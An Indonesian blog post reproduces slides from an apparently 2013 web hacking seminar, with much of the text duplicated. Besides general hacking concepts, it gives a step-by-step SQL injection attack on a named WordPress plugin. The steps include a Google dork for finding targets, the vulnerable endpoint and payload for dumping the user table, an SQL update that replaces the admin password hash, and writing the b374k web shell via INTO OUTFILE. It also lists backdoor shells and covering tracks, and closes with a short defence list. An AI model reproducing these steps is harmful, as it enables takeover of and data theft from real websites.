Web Hacking X-Code 2 Maret 2013
UIN Maulana Malik Ibrahim Malang
Pengenalan Hacking
Konsep dasar ethical hacker?
Pemahaman dasar ethical hacker
Keamanan komputer menjadi penting?
Perkembangan komputer
Ketergantungan manusia
Tuntutan kompleksitas semakin tinggi
Keamanan menjadi anak tiri
Kemampuan orang disebut hacker menjadi menurun
Kemampuan rendah bisa menjadi ancaman tinggi untuk kepentingan umum
Terminologi hacker
Contoh Situs yang menyediakan exploits
Metasploit Frameworks
Exploit-db.com
securityfocus.com
Darkc0de.com
packetstormsecurity.org
Element-element
keamanan (CIA)
u Confidentiality
Keamanan informasi data untuk
diketahui atau dibaca oleh pihak yang tidak dikehendaki
u Integrity /
integritas
Keamanan informasi data untuk
menghindari adanya perubahan yang tidak dikehendaki
u Availability
Keamanan informasi data untuk
ketersediaan atau keberadaannya
Triangle
Keamanan
Pengelompokkan
hacker
- Black Hat Hacker
- White Hat Hacker
- Grey Hat Hacker
- Suicide Hacker
Tahapan
aktifitas Hacking
- Reconnaissance
- Scanning
- Gaining Acces
- Maintaining acces
- Covering Tracks
Reconnaissance
Reconnaissance
Passive
u Pencarian
data target di google
u Pencarian
data target di berbagai jejaring sosial Reconnaissance
Active
u HTTP
Fingerprint
Pencarian exploit berdasarkan scanningGoogle.com
Archive Milw0rm
Archive Exploit DB
Metasploit Framework
Darkc0de
Gaining AccesExploitasi Remote Execution pada celah keamanan OS
Exploitasi Remote Execution pada celah keamanan aplikasi
Exploitasi Remote Execution pada celah keamanan web
Maintaining AccesPHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K
Covering tracksPembersihan berbagai exploit atau software yang diupload
Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.
Archive Milw0rm
Archive Exploit DB
Metasploit Framework
Darkc0de
Gaining AccesExploitasi Remote Execution pada celah keamanan OS
Exploitasi Remote Execution pada celah keamanan aplikasi
Exploitasi Remote Execution pada celah keamanan web
Maintaining AccesPHP Backdoor
Simple php shell
R57
C99 / C100
ASP Backdoor
B374K
Covering tracksPembersihan berbagai exploit atau software yang diupload
Pembersihan jejak disesuaikan dengan penggunaan aplikasi di target dan ke target.
GET dan POSTGET :
www.site.com/form.php?nama=zae
POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
Langsung dari URL
http://localhost/ict2013/materi/nilai_GET.html
Header : Content-Type: application/x-www-form-urlencoded
Data : variable=value
http://localhost/ict2013/materi/nilai_POST.html
Query
$query = “SELECT * FROM contoh WHERE nama =’$username’”;
$username = dari GET atau POST
SQL Injection
query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
$query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
www.site.com/form.php?nama=zae
POST : www.site.com/form.php
IMPLEMENTASI pada method GET & POST
Langsung dari URL
http://localhost/ict2013/materi/nilai_GET.html
Header : Content-Type: application/x-www-form-urlencoded
Data : variable=value
http://localhost/ict2013/materi/nilai_POST.html
Query
$query = “SELECT * FROM contoh WHERE nama =’$username’”;
$username = dari GET atau POST
SQL Injection
query = “SELECT namaTabel FROM contoh WHERE nama =’$username’”; DROP TABLE namaTabel; --’
$query = “SELECT namaTabel FROM contoh WHERE nama =‘terserah‘ OR ‘x’ = ‘x’”;
Vulnerability Info
Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
Version : 2.7.1 - 3.0.1
Link : http://wordpress.org/extend/plugins/store-locator-le/
Plugins : http://downloads.wordpress.org/plugin/store-locator-le.3.0.1.zip
Date : 26-05-2012
Google Dork : inurl:/wp-content/plugins/store-locator-le/
Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php
SQL Injection Vuln
Description : Wordpress Plugins - Google Maps via Store Locator Plus Multiple Vulnerability
Version : 2.7.1 - 3.0.1
Link : http://wordpress.org/extend/plugins/store-locator-le/
Plugins : http://downloads.wordpress.org/plugin/store-locator-le.3.0.1.zip
Date : 26-05-2012
Google Dork : inurl:/wp-content/plugins/store-locator-le/
Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
http://www.exemple.com/wordpress/wp-content/plugins/store-locator-le/downloadcsv.php
SQL Injection Vuln
POST Method, Advanced REST Client
URL : http://localhost/demo/wp-content/plugins/store-locator-le/downloadcsv.php
Method : POST
Header : Content-Type: application/x-www-form-urlencoded
Data : query=[injection]
Contoh:
query=SELECT * FROM wp_users
Mengatasi Teka-Teki Hash
UPDATE – replace password
UPDATE wp_users SET user_pass = '$P$BAu2rgOUahu8hibdJ12ToW4zu6b.XB.' WHERE `wp_users`.`ID` =1 LIMIT 1 ;
Mengganti password menjadi “password"
Upload b374k via Query
SELECT ’[kode script]’ INTO OUTFILE “e:/AppServ/www/ict2013/exploit.php”
http://localhost/ict2013/wp-content/plugins/store-locator-le/core/load_wp_config.php
+ diganti %2B
Base 64 Encryption
Base64 adalah istilah umum untuk sejumlah skema pengkodean serupa yang mengkodekan data biner dan menerjemahkannya ke dalam representasi basis 64. Istilah Base64 berasal dari konten pengkodean MIME tertentu. (Wikipedia, 2010)
PENGAMANAN
- Update CMS, plugin
- Menggunakan mysql_real_escape_string()
- Memberikan validasi pada tiap inputan
- Berikan length limit pada inputan
- Config database error report
- Setting php.ini
- dll
Tidak ada komentar:
Posting Komentar